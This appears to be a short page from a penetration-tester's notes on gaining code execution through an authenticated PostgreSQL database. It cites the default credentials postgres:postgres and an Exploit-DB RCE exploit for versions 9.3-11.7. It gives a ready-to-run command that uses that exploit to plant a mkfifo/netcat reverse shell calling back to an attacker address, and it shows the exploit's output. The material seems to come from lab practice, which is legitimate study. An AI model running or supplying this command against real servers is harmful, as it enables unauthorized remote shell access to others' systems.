Authenticated PostgresSQL

If we have valid credentials for a PostgresSQL DB

We should follow this article on RCE.

LogoCommand Execution with PostgreSQL Copy CommandMedium

As well as using this exploit if the versions match

LogoPostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)Exploit Database

The default cred are postgres:postgres

Depending on which system we are tareting I recommend using this payload for getting a reverse shell out of this. 

python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f' 

[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67
PreviousAuthenticated MSSQL ShellNextAuthenticated MongoDB

Last updated